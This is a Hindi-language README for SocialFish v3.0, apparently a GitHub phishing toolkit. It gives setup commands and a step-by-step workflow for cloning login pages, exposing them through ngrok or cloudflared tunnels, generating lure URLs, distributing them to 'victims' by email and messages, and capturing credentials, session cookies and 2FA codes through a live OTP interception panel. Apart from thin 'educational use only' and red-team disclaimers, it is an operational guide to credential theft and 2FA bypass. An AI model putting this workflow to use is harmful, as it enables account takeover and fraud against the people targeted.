
अधिकृत रेड टीम अभ्यासों के लिए आधुनिक गतिशील फिशिंग टूलकिट। लॉगिन पेजों को क्लोन करता है, क्रेडेंशियल्स, कुकीज़ और 2FA कोड को कैप्चर करता है, जिसमें एक लाइव ऑपरेटर पैनल और टनलिंग सपोर्ट शामिल है।
SocialFish v3.0 आधुनिक लॉगिन पेजों को क्लोन करने, कुकीज़ कैप्चर करने और लाइव ऑपरेटर पैनल के साथ 2FA कोड इंटरसेप्ट करने के लिए शक्तिशाली नई सुविधाएँ लाता है।
python setup.py
यह करेगा:
pip install -r requirements.txt
playwright install chromium
python SocialFish.py admin password
फिर एक्सेस करें: http://localhost:5000/neptune
टेम्पलेट बनाएँ
/templates → नया टेम्पलेट → लक्ष्य URL दर्ज करें
टनल सेटअप करें (दूरस्थ परीक्षण के लिए वैकल्पिक)
"Tunnel" पर क्लिक करें → ngrok/cloudflared चुनें → अधिकृत करें
लालच URL उत्पन्न करें
"Lure" पर क्लिक करें → अप्रत्याशित URL कॉपी करें
पीड़ितों को भेजें
ईमेल, संदेशों आदि में लालच URL वितरित करें
रीयल-टाइम में निगरानी करें
/sessions → कैप्चर किए गए क्रेडेंशियल्स, कुकीज़, OTP कोड देखें
/admin/otp_panel.html → 2FA कोड इंटरसेप्ट और इंजेक्ट करें
both (क्रेडेंशियल + कुकीज़), login (केवल क्रेडेंशियल), cookies (केवल सत्र)किसी भी लॉगिन पेज के साथ काम करता है जो उपयोग करता है:
# टेम्पलेट सूचीबद्ध करें
curl http://localhost:5000/templates
# लालच URL उत्पन्न करें
curl -X POST http://localhost:5000/lure/generate \
-d "template_id=1"
# सत्र देखें
curl http://localhost:5000/session/1
# सेटअप
python setup.py # इंटरैक्टिव सेटअप
# टनलिंग
python core/tunnel_manager.py setup
python core/tunnel_manager.py start --type ngrok
# डेटाबेस
python core/db_migration.py
SocialFish/
├── SocialFish.py # मुख्य Flask ऐप
├── setup.py # इंटरैक्टिव सेटअप विज़ार्ड
├── FEATURES_v3.md # सुविधा दस्तावेज़ीकरण
├── IMPLEMENTATION_SUMMARY.md # तकनीकी विवरण
├── core/
│ ├── recorder_playwright.py # ब्राउज़र ऑटोमेशन
│ ├── cookie_inspector.py # कुकी विश्लेषण
│ ├── tunnel_manager.py # टनलिंग समर्थन
│ ├── db_migration.py # डेटाबेस स्कीमा
│ └── ... (अन्य मॉड्यूल)
└── templates/
└── admin/
├── templates.html # टेम्पलेट लाइब्रेरी UI
├── otp_panel.html # OTP इंटरसेप्शन UI
├── sessions.html # सत्र प्रबंधन UI
└── ... (अन्य टेम्पलेट)
⚠️ केवल शैक्षिक उपयोग के लिए
विवरण के लिए CODE_OF_CONDUCT.md और LICENSE देखें।
मोबाइल नियंत्रक की तलाश है? SocialFishMobile देखें
केवल शैक्षिक उद्देश्यों के लिए उपयोग किया जाए
SocialFish का उपयोग अंतिम-उपयोगकर्ता की पूर्ण जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
"अस्वीकृत। किसी भी स्थिति में कॉपीराइट धारक या योगदानकर्ता किसी भी प्रत्यक्ष, अप्रत्यक्ष, आकस्मिक, विशेष, अनुकरणीय, या परिणामी क्षति (सीमित नहीं, विकल्पी वस्तुओं या सेवाओं की खरीद; उपयोग, डेटा, या लाभ की हानि; या व्यवसाय में रुकावट) के लिए उत्तरदायी नहीं होंगे, चाहे वह किसी भी सिद्धांत पर आधारित हो, चाहे अनुबंध में, कठोर दायित्व में, या अपकृत्य में (लापरवाही सहित) इस सॉफ़्टवेयर के उपयोग से उत्पन्न, भले ही ऐसी क्षति की संभावना के बारे में सलाह दी गई हो।"
LICENSE से लिया गया।
Docker के साथ चलाएँ:
docker compose up
स्थिति: अधिकृत सुरक्षा परीक्षण और रेड टीम अभ्यास के लिए उत्पादन-तैयार
हम आपको SocialFish में योगदान देने के लिए प्रोत्साहित करते हैं! कृपया आगे बढ़ने के तरीके के बारे में दिशानिर्देशों के लिए Contributing to SocialFish गाइड देखें। हमसे जुड़ें!
@carinamary2448 - https://github.com/carinamary2448